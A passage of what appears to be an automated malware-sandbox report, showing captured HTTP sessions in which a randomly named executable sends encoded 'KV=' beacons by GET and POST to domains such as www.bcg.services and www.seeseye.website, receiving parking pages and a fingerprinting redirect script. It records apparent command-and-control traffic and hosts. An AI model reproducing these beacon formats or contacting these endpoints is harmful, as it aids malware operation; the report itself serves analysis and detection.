                                                                                                                        set-cookie: __tad=1732118165.8770228; expires=Sat, 18-Nov-2034 15:56:05 GMT; Max-Age=315360000
                                                                                                                        vary: Accept-Encoding
                                                                                                                        content-encoding: gzip
                                                                                                                        content-length: 579
                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                        connection: close
                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a7 08 b6 02 89 e5 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 d1 50 d7 96 51 d1 a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 58 e4 c7 70 54 78 e5 74 4f 40 fb 1e 45 4c 78 4f f9 ad dc ca 63 34 06 ef 94 88 f3 5b 9f d7 da ac d1 f5 4e 1b ca b5 ae 31 eb b4 c9 6e 7d 5c 16 f9 11 fb 56 aa 32 da 4a 07 0e 2b ed 50 d1 9f 56 9b 3b 10 90 34 44 fd 22 cf 77 bb 5d f6 4a 62 3e bf da 77 f9 e7 64 19 45 79 0e 37 48 20 81 74 87 76 43 60 6b 98 cf 66 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 0d 21 03 9f ea 80 ae 81 1a 84 17 f2 a1 77 b6 d3 9e 63 52 b7 1e 6a eb c0 db 0e 99 22 bd 35 51 bd 31 8a b4 35 7c dc b6 2b a9 ee ae c7 54 e9 14 1e a2 c9 4e 9b ca ee b2 d6 2a 19 50 99 c3 be 95 0a d3 7f 8c 9d 27 75 2f 2e ae 92 e9 32 3a 44 11 b9 7d 60 b2 4a 4f e0 2a f7 6b 34 21 c0 23 8d 9b f4 75 b5 0f c1 20 f3 27 a1 6b 75 ff 73 d4 2c e0 eb b3 93 ef 37 ac 43 56 e9 43 67 8d 26 cb a1 f5 22 c8 f6 78 08 [TRUNCATED]
                                                                                                                        Data Ascii: Tn0=_A;jnAX-y4(7C-==rPQAZ,==f;\yMXpTxtO@ELxOc4[N1n}\V2J+PV;4D"w]Jb>wdEy7H tvC`kfiGeM,=!wcRj"5Q15|+TN*P'u/.2:D}`JO*k4!#u 'kus,7CVCg&"x+L2nID5)/~R83Il}(Z0|>OPf `jRtna=2l];1rv@L^mY=v6,["gkpa-0ju:"|2vTtH^px"-5=eC/uy0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        28192.168.2.1150004103.224.182.242803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:06.973932981 CET507OUTGET /37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.seeseye.website
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:56:08.272437096 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Wed, 20 Nov 2024 15:56:08 GMT
                                                                                                                        server: Apache
                                                                                                                        set-cookie: __tad=1732118168.4972690; expires=Sat, 18-Nov-2034 15:56:08 GMT; Max-Age=315360000
                                                                                                                        vary: Accept-Encoding
                                                                                                                        content-length: 1474
                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 73 65 65 73 65 79 65 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 65 73 65 79 65 2e 77 65 62 73 69 74 65 2f 33 37 79 6d 2f 3f 4b 56 3d 38 2f 74 2f 6d 64 4e 66 32 52 51 4d 4f 61 4e 42 4e 4a 30 43 32 43 48 51 43 5a 74 53 66 47 45 73 50 4b 78 73 62 39 32 55 34 67 79 30 49 7a 6f 6a 72 6a 47 35 64 70 47 78 72 61 62 4d 65 66 42 2b 54 69 43 57 43 45 2b 49 2b 4f 77 4b 56 4d 6b 74 69 32 73 37 64 36 4a 39 59 4a 6a 65 44 39 6a 47 69 62 6d 67 44 41 77 67 61 77 46 6e 52 6e 50 6d 55 63 53 73 47 63 49 3d 26 57 6e 6f 3d 61 30 71 44 [TRUNCATED]
                                                                                                                        Data Ascii: <html><head><title>seeseye.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" t
                                                                                                                        Nov 20, 2024 16:56:08.272510052 CET510INData Raw: 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 65 73 65 79 65 2e 77 65 62 73 69 74 65 2f 33 37 79
                                                                                                                        Data Ascii: ext="#000000"><div style='display: none;'><a href='http://www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq&fp=-3'>Click here to ent


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        29192.168.2.1150005199.59.243.227803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:14.525746107 CET774OUTPOST /mxde/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.bcg.services
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.bcg.services
                                                                                                                        Referer: http://www.bcg.services/mxde/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 78 7a 69 52 6e 64 4d 49 66 56 65 55 31 5a 69 53 34 4b 4c 62 32 38 72 49 74 65 66 65 74 37 52 6b 45 38 4f 71 45 64 69 4f 79 66 6a 71 45 47 57 45 59 79 53 31 72 50 33 36 63 75 2f 73 58 74 51 39 4e 71 6e 33 37 42 46 65 47 6c 4e 44 54 36 42 35 31 4e 72 6e 46 2f 56 72 58 66 69 42 57 37 6b 49 6c 30 47 42 58 2b 52 45 67 4a 66 34 68 55 6a 2b 64 4a 45 55 44 62 32 33 4c 74 57 71 70 6f 2f 61 68 66 58 6f 75 77 66 73 48 75 68 72 7a 63 2b 54 34 6e 67 44 4f 6d 38 72 57 6c 4b 44 4d 65 56 42 4c 7a 54 62 73 58 48 75 6b 7a 6c 4a 62 4e 6e 32 53 63 2b 30 59 76 58 79 75 39 62 36 55 65 64 4a 38 41 3d 3d
                                                                                                                        Data Ascii: KV=xziRndMIfVeU1ZiS4KLb28rItefet7RkE8OqEdiOyfjqEGWEYyS1rP36cu/sXtQ9Nqn37BFeGlNDT6B51NrnF/VrXfiBW7kIl0GBX+REgJf4hUj+dJEUDb23LtWqpo/ahfXouwfsHuhrzc+T4ngDOm8rWlKDMeVBLzTbsXHukzlJbNn2Sc+0YvXyu9b6UedJ8A==
                                                                                                                        Nov 20, 2024 16:56:15.690228939 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Wed, 20 Nov 2024 15:56:14 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1114
                                                                                                                        x-request-id: 03425cf7-020a-42f2-b093-ab63fd8c3ade
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RnO6QMUMOInPg6iQT8f51QJa+uplAhmMfSxFDm/R3qLAnsTDe62RUvOFigN9YYBdePRUUtvgKjOAT5vIw+LvXQ==
                                                                                                                        set-cookie: parking_session=03425cf7-020a-42f2-b093-ab63fd8c3ade; expires=Wed, 20 Nov 2024 16:11:15 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 6e 4f 36 51 4d 55 4d 4f 49 6e 50 67 36 69 51 54 38 66 35 31 51 4a 61 2b 75 70 6c 41 68 6d 4d 66 53 78 46 44 6d 2f 52 33 71 4c 41 6e 73 54 44 65 36 32 52 55 76 4f 46 69 67 4e 39 59 59 42 64 65 50 52 55 55 74 76 67 4b 6a 4f 41 54 35 76 49 77 2b 4c 76 58 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RnO6QMUMOInPg6iQT8f51QJa+uplAhmMfSxFDm/R3qLAnsTDe62RUvOFigN9YYBdePRUUtvgKjOAT5vIw+LvXQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                        Nov 20, 2024 16:56:15.690253973 CET567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDM0MjVjZjctMDIwYS00MmYyLWIwOTMtYWI2M2ZkOGMzYWRlIiwicGFnZV90aW1lIjoxNzMyMTE4MT


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        30192.168.2.1150006199.59.243.227803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:17.193734884 CET794OUTPOST /mxde/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.bcg.services
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.bcg.services
                                                                                                                        Referer: http://www.bcg.services/mxde/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 78 7a 69 52 6e 64 4d 49 66 56 65 55 30 35 53 53 30 4a 6a 62 78 63 72 4c 77 75 66 65 6a 62 51 74 45 38 53 71 45 5a 37 44 7a 73 48 71 4b 45 4f 45 62 77 36 31 6f 50 33 36 58 4f 2f 6a 4a 64 51 6d 4e 71 37 5a 37 41 35 65 47 6c 5a 44 54 2b 46 35 79 36 33 6b 4b 50 56 70 62 2f 69 48 53 37 6b 49 6c 30 47 42 58 2b 56 71 67 4a 48 34 6d 6b 54 2b 65 74 51 54 64 72 32 77 4d 74 57 71 34 59 2f 65 68 66 57 50 75 78 7a 43 48 73 70 72 7a 5a 43 54 34 31 45 63 45 6d 38 74 53 6c 4c 76 43 38 34 4f 4e 7a 32 75 6f 55 4c 45 6f 41 73 74 58 72 71 73 43 2f 33 6a 62 38 66 77 36 62 36 4b 64 76 34 41 6e 4a 45 6b 2b 73 67 34 45 35 69 4e 33 70 68 36 6c 34 75 48 73 47 30 3d
                                                                                                                        Data Ascii: KV=xziRndMIfVeU05SS0JjbxcrLwufejbQtE8SqEZ7DzsHqKEOEbw61oP36XO/jJdQmNq7Z7A5eGlZDT+F5y63kKPVpb/iHS7kIl0GBX+VqgJH4mkT+etQTdr2wMtWq4Y/ehfWPuxzCHsprzZCT41EcEm8tSlLvC84ONz2uoULEoAstXrqsC/3jb8fw6b6Kdv4AnJEk+sg4E5iN3ph6l4uHsG0=
                                                                                                                        Nov 20, 2024 16:56:18.363274097 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Wed, 20 Nov 2024 15:56:18 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1114
                                                                                                                        x-request-id: 9efeec3e-af86-4fc9-b90d-9f1aa4156492
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RnO6QMUMOInPg6iQT8f51QJa+uplAhmMfSxFDm/R3qLAnsTDe62RUvOFigN9YYBdePRUUtvgKjOAT5vIw+LvXQ==
                                                                                                                        set-cookie: parking_session=9efeec3e-af86-4fc9-b90d-9f1aa4156492; expires=Wed, 20 Nov 2024 16:11:18 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 6e 4f 36 51 4d 55 4d 4f 49 6e 50 67 36 69 51 54 38 66 35 31 51 4a 61 2b 75 70 6c 41 68 6d 4d 66 53 78 46 44 6d 2f 52 33 71 4c 41 6e 73 54 44 65 36 32 52 55 76 4f 46 69 67 4e 39 59 59 42 64 65 50 52 55 55 74 76 67 4b 6a 4f 41 54 35 76 49 77 2b 4c 76 58 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RnO6QMUMOInPg6iQT8f51QJa+uplAhmMfSxFDm/R3qLAnsTDe62RUvOFigN9YYBdePRUUtvgKjOAT5vIw+LvXQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                        Nov 20, 2024 16:56:18.363298893 CET567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWVmZWVjM2UtYWY4Ni00ZmM5LWI5MGQtOWYxYWE0MTU2NDkyIiwicGFnZV90aW1lIjoxNzMyMTE4MT


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        31192.168.2.1150007199.59.243.227803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:19.862993956 CET1807OUTPOST /mxde/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.bcg.services
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.bcg.services
                                                                                                                        Referer: http://www.bcg.services/mxde/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 78 7a 69 52 6e 64 4d 49 66 56 65 55 30 35 53 53 30 4a 6a 62 78 63 72 4c 77 75 66 65 6a 62 51 74 45 38 53 71 45 5a 37 44 7a 73 50 71 4b 78 61 45 62 58 4f 31 70 50 33 36 55 4f 2f 67 4a 64 52 6b 4e 71 7a 64 37 41 31 67 47 68 70 44 51 64 64 35 7a 4f 44 6b 52 66 56 70 54 66 69 47 57 37 6b 6e 6c 77 71 64 58 2b 46 71 67 4a 48 34 6d 69 58 2b 4a 70 45 54 66 72 32 33 4c 74 57 63 70 6f 2f 32 68 66 4f 31 75 78 48 38 48 59 64 72 7a 39 65 54 2f 47 67 63 49 6d 38 76 65 46 4c 33 43 38 31 4f 4e 7a 37 52 6f 58 58 69 6f 48 6f 74 48 61 4b 78 63 72 2f 33 49 4f 6a 7a 6d 37 79 4f 42 4e 51 72 76 49 34 71 6f 39 6b 49 48 35 2b 49 34 4c 6b 44 39 72 76 59 33 41 5a 4a 72 73 59 75 74 62 73 46 4d 64 50 67 50 68 36 56 49 62 4b 56 6a 31 63 54 34 61 58 55 74 38 6a 49 73 48 50 48 56 61 51 74 71 53 35 55 4b 55 49 36 6a 73 4b 30 75 45 67 66 4b 35 6b 4a 55 75 63 6d 64 5a 76 47 53 49 34 39 2f 66 62 36 37 78 6d 53 7a 75 2b 41 4e 72 59 35 52 51 45 32 31 64 61 35 5a 59 6d 78 64 48 72 52 48 37 53 79 63 2b 45 4b 30 56 44 2f 4a 69 62 [TRUNCATED]
                                                                                                                        Data Ascii: KV=xziRndMIfVeU05SS0JjbxcrLwufejbQtE8SqEZ7DzsPqKxaEbXO1pP36UO/gJdRkNqzd7A1gGhpDQdd5zODkRfVpTfiGW7knlwqdX+FqgJH4miX+JpETfr23LtWcpo/2hfO1uxH8HYdrz9eT/GgcIm8veFL3C81ONz7RoXXioHotHaKxcr/3IOjzm7yOBNQrvI4qo9kIH5+I4LkD9rvY3AZJrsYutbsFMdPgPh6VIbKVj1cT4aXUt8jIsHPHVaQtqS5UKUI6jsK0uEgfK5kJUucmdZvGSI49/fb67xmSzu+ANrY5RQE21da5ZYmxdHrRH7Syc+EK0VD/JibS6j9fDrP2EqC45MR2bEOuhzEedCkJZh8UUayuOoxp5PxTPXCTlGAILQoEBRH5TW+DWCeq/qJiVnjOlelxc5laFk2rMJr0LNcPjMtKSz6hfVG720EP3Pm8kQDlfX6krIlJvAunaW5UCexFM+rHPtDF2YE5Ebl1kXnfA8XzZhAv7HA49+BFUu67yCwS8OJTOCU/ynn2Hvlcz1rOyzsfddjd75IS/4dpmmoIsl4pY6LgNXBDXues7+R0p99h86LlUrTM7E/F7EQTYGVL0soWgqes8q+d2+hoXNzYk7NV1SP832vt2iDo//bnKLJH0vUyjAKQGiQl+ZGmpi0utawHn0aRpB0PRGcwVSJ0MiQYJ+2cMswonBblGc0lWJMRHtbdL+ThNaIdXp1e1c2sS/ZFcSyxTRClIfOESdRHUlR3DCPKDMSc2M51DSTdAZUZ1GSAjL1HxWxekA4Ep+zRyfFXXKe4zsmNosLMRn5MRouJ9/omtgq1TTkkYXOIWJfBgCR750YTMD2C62otJWJaMQWh+DMjOaU1DF9N/0rnq0IWtu/k/fMWkhWUv4BvvEVGWh6+pw0NhXEgBHMkk3o91JmQISmkD8tcdFGShkDQujNlSFOTYKaE9S+kv+HrKE1FHo9EiO1U+/l2qjB6lXq4BpGsUgFfPKR8WWaQMch9U [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:56:20.993493080 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Wed, 20 Nov 2024 15:56:20 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1114
                                                                                                                        x-request-id: 351d76df-d9c9-4417-b8f1-931057f3993e
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RnO6QMUMOInPg6iQT8f51QJa+uplAhmMfSxFDm/R3qLAnsTDe62RUvOFigN9YYBdePRUUtvgKjOAT5vIw+LvXQ==
                                                                                                                        set-cookie: parking_session=351d76df-d9c9-4417-b8f1-931057f3993e; expires=Wed, 20 Nov 2024 16:11:20 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 6e 4f 36 51 4d 55 4d 4f 49 6e 50 67 36 69 51 54 38 66 35 31 51 4a 61 2b 75 70 6c 41 68 6d 4d 66 53 78 46 44 6d 2f 52 33 71 4c 41 6e 73 54 44 65 36 32 52 55 76 4f 46 69 67 4e 39 59 59 42 64 65 50 52 55 55 74 76 67 4b 6a 4f 41 54 35 76 49 77 2b 4c 76 58 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RnO6QMUMOInPg6iQT8f51QJa+uplAhmMfSxFDm/R3qLAnsTDe62RUvOFigN9YYBdePRUUtvgKjOAT5vIw+LvXQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                        Nov 20, 2024 16:56:20.993572950 CET567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
